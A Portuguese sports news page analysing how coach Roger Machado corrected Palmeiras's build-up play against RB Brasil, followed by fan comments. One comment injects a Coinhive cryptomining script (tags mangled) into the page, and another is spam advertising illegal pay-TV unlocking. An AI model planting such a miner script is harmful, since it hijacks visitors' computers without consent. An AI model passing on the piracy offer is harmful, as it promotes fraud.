Palmeiras mostra problemas de criação, mas Roger Machado resolve

26/1/2018 09:21

Palmeiras mostra problemas de criação, mas Roger Machado resolve

Palmeiras mostra problemas de criação, mas Roger Machado resolve

Roger Machado na partida contra o RB Brasil (Foto: Marco Galvão / Estadão Conteúdo)



Roger Machado deu um ótimo exemplo de como corrigir um time na partida contra o RB Brasil, na quinta-feira. Durante a primeira etapa da partida, a saída de bola com três jogadores utilizada pelo Verdão nos primeiros jogos da temporada não estava funcionando por dois motivos: laterais apressados e um volante com menor qualidade no passe.







Mas como assim? O primeiro elemento que prejudicou essa saída foi explicado pelo treinador na coletiva após a partida. Segundo ele, os dois laterais do Verdão estavam se projetando no campo de ataque muito rápido. Assim, quando recebiam a bola, tinham pouco tempo para executar a jogada. O outro ponto que dificultou essa saída foi o volante Thiago Santos, que diferentemente de Felipe Melo, não tem tanta qualidade no passe.



Abaixo explicamos como o problema se desenvolveu na partida, e como o treinador Roger Machado conseguiu resolver no segundo tempo.



O problema

Os dois laterais do Palmeiras, Victor Luis e Mayke, afundaram muito para o campo de ataque no primeiro tempo. Quando a bola chegava para os dois zagueiros, eles forçavam o passe para eles. Os dois, porém, não tinham tempo para pensar e fazer a jogada.



Somado a isso estava Thiago Santos, autor dos dois gols do Verdão, que não se apresentou para receber a bola dos zagueiros tanto quanto Felipe Melo. E quando ele vinha buscar a bola, naturalmente não dava a mesma qualidade no passe que o "Pitbull".



No lance do gol do RB Brasil, isso fica claro. Antônio Carlos recebe a bola de Thiago Martins, que não tinha como passar para Lucas Lima, e não vê nenhuma opção livre de marcação à frente. Thiago Santos, que deveria estar próximo dos zagueiros, afunda no campo de ataque, forçando o passe para frente. Na sequência, o RB Brasil rouba a bola e chega com igualdade numérica na área. Mas essa dificuldade na armação das jogadas foi resolvida pelo treinador.



A solução

Roger Machado percebeu isso no segundo tempo e mudou a maneira de sair jogando de sua defesa. Ele pediu para que os laterais se aproximassem da zaga, para dar uma opção "lateralizada" na saída de bola. E o treinador explicou essa mudança, veja no parágrafo a seguir:



– O posicionamento alterado foi que na saída de bola, com o adversário se defendendo, nossos laterais estavam se projetando antes do tempo para o campo de ataque. Então quando a bola era saída de um zagueiro, eles não conseguiam abrir o campo e olhar para frente, porque muito rapidamente já chegava a marcação – explicou Roger.



– O que eu pedi foi que na hora que chegasse a bola para os zagueiros, que dessemos uma opção mais lateralizada para eles. Isso não tenha dúvida que foi bem entendido. Porque às vezes você precisa sair com a linha de três, mas no intervalo eu corrigi, falei que não sairíamos com a linha de três, mas sim com a de quatro, para justamente você ter as asas mais abertas e municiar os jogadores com jogadas laterais – disse o treinador.



Veja na jogada abaixo como Mayke recua para dar essa opção mais "lateralizada" para Antônio Carlos. Do outro lado, Lucas Lima faz o mesmo, já que Victor Luis afundou no campo de ataque. O meia recebe o passe de Thiago Martins e aciona o lateral na esquerda. Isso mostra que a equipe de Roger Machado vem conseguindo assimilar suas orientações.



– Eu consigo muito mais elementos quando há uma resistência por parte do adversário, porque aí sim vai aparecer onde você precisa corrigir os posicionamentos. Nos gols deles, quando atingiram o terço final do campo, a gente estava em igualdade numérica dentro da área, e isso você dificilmente consegue intervir um cruzamento, tem que ter superioridade. Faltou cobertura, um posicionamento mais adequado do Mayke. Mas é válido por isso – finalizou o treinador.



VEJA TAMBÉM
- Estêvão marca gol da vitória do Palmeiras sobre o Cuiabá na Arena Pantanal
- Vitória do Palmeiras com gols de Lázaro e Estêvão: confira as notas!
- Abel escala Palmeiras sem Veiga e com Rony titular para partida contra Cuiabá





8313 visitas - Fonte: Globo Esporte

Mais notícias do Palmeiras

Notícias de contratações do Palmeiras
Notícias mais lidas

tchê tchê banco á qualidade que temos de meio campo de volante e o Roger ainda pedir para Borja ajuda na marcação tá de brincadeira em Roger deixa o cara lá na área volante tem que ser Moisés e Felipe Melo o William não pode ser banco se continuar assim não vamos ganhar nada esse ano keno jogador pra entrar no segundo tempo

esse perengue pra ganhar do rb brasil, não vamos ganhar nada esse ano !

tchê tchê não dá mais para ser titular . no lugar dele tem que ser o Moisés quando voltar Borja tá sendo esforçado mais perdendo muito gols

o nome disso é aproximação e o Palmeiras tem essa deficiência já faz anos. Os outros técnicos que passaram não corrigiram isso no passado e espero que o Roger corrija. Vejam a aproximação é o que o Tite mais valoriza.

Tivemos sorte, falta muito para o Palmeiras encantar. Com destaques individuais, Jaílson e Thiago Martins, o restante rendimento muito abaixo do esperado. Lucas Lima longe do que sabe jogar. Borja não se encontra. Tchê tchê não joga faz tempo. William e Keno, apenas lampejo. Roger Machado, muito teórico, logo logo o Palmeiras só contratará jogadores com nível universitário. Ainda temos tempo, é preciso consertar muita coisa. Tem jogadores que não serão titulares. O setor que me preocupa é o ataque. Com jogadores que temos era pra chutar mais a gol.

a defesa e flaquissima.

uma coisa eu concordo esse tchê tchê tem que ir para o banco

vocês tem que dar um tempo para o técnico e os jogadores, estamos no começo de temporada...muita reclamação... ninguém presta nunca pra vocês

Antonio Carlos e Borja não da.

Felipe Melo tem que jogar junto com Bruno Henrique. Tchê Tchê no banco.

Willian e Guerra tem que jogar.

Ficou claro isso ontem, Lucas Lima precisa de um parceiro pra dividir na criação.

mais uma vez esqueceram de arrumar a defesa imagina disputar um campeonato brasileiro é uma libertadores com essa zaga eu nem quero nem assistir

Com esse time ai não vamos ganhar nada, me desculpem mas com Antônio Carlos, Maike, Victor Luís e Thiago Santos esses caras não são jogadores para estarem no Palmeiras, tudo bem que o Thiago fez os dois gols mas também até cego faria esses gols.

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou .

Últimas notícias

publicidade
publicidade

Brasileiro

Qua - 20:00 - Arena Barueri -
X
Palmeiras
Internacional

Brasileiro

Dom - 18:30 - Manoel Barradas
0 X 1
Vitoria
Palmeiras